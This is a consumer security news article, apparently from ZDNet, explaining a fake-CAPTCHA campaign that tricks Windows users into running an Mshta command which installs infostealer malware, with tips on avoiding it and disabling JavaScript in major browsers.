Thursday, March 13, 2025
Latest:
ZDNet | Security

That weird CAPTCHA could be a malware trap – here’s how to protect yourself

TH Author
Cybercriminals are using fake CAPTCHAs to steal your data - how to protect yourself

ZDNET

A persistent malware campaign is exploiting the ubiquitous CAPTCHA process to try to steal data from unsuspecting victims.

Also: Got a suspicious E-ZPass text? It’s a trap – how to spot the scam

As described by security firm Malwarebytes in a new report, this scheme relies on the ease with which people often follow the steps in a CAPTCHA prompt without thinking.

How the attack works

You land on a website that promises movies, music, pictures, news articles, or some other interesting content. A CAPTCHA prompt pops up, asking you to prove that you’re not a robot. As we’re all so used to these types of requests, many of us wouldn’t think twice about accepting it.

AlsoWhy rebooting your phone daily is your best defense against zero-click attacks

But instead of the usual CAPTCHA challenge that asks you to choose certain images in a picture or identify distorted characters, this one serves up the instructions seen in the image below:

CAPTCHA clipboard hijacker

Malwarebytes

At this point, most savvy users would realize that something is off here and exit the site. But remember that cybercriminals aren’t targeting savvy users; they’re trying to hit people who are less knowledgeable and more easily tricked. Even sophisticated users in a rush or on autopilot could fall prey to the trap.

If you follow the steps, the website copies a text string to your Windows clipboard. Normally, you’d have to grant your permission for such an action, but you already did so by checking a checkbox on the first screen of the CAPTCHA prompt.

Also: What is vishing? Voice phishing is surging – expert tips on how to spot it and stop it

As seen in the Windows Run text field, the string says simply: “I’m not a robot — reCAPTCHA Verification ID: 8253.” But behind the scenes is another string, one that runs a Windows command called Mshta.exe. Normally, this file is a legitimate and safe command used to execute code, but hackers and scammers can easily exploit it to download and install malware. And that’s exactly what happens here.

Windows Run command for a CAPTCHA challenge

Malwarebytes

In this case, Mshta grabs a malicious media file from the website. The name of the file may look innocent enough. Malwarebytes said that it’s seen files with such extensions as mp3, mp4, jpg, jpeg, swf, and html. But the file itself contains an encoded PowerShell command that invisibly downloads and runs the actual destructive payload.

In the past, the downloaded malware was almost always the Lumma Stealer infostealer. But with more recent campaigns, the attackers have used SecTopRAT instead. Either way, the malware is designed to infect your PC to steal sensitive data.

How to protect yourself

Aside from knowing the tactics, how can you protect yourself from this campaign and similar ones? Malwarebytes offers a few tips:

  1. Never follow instructions given on a website without thinking it through first.
  2. Use a security program and browser extension that block malicious websites and scripts.
  3. Disable JavaScript in your browser if you’re visiting random or unknown websites. In the campaign described by Malwarebytes, access to the clipboard is granted via a JavaScript function. Disabling JavaScript will thwart the attack; however, it may prevent you from using many regular sites that you visit. You may want to block it in general but allow it for specific sites.

Disabling JavaScript

To disable JavaScript in Google Chrome, go to Settings, select Privacy and security, and then click Site settings. Click the setting for JavaScript and change the option to “Disable JavaScript for all sites.” You can then add specific sites that are allowed to use JavaScript.

Also: A new Android feature is scanning your photos for ‘sensitive content’ – how to stop it

To disable JavaScript in Edge, go to Settings, select Cookies and Site Permissions, and then click JavaScript. Turn off the switch for Allowed, and then add any individual sites for which you want JavaScript to work.

To disable JavaScript in Firefox, you’ll have to install a third-party add-on or use the configuration editor. For that, type about:config in the address field and accept the risk to continue. Type javascript.enabled in the search field and select the result. Double-click it to change the value from true to false.

READ MORE HERE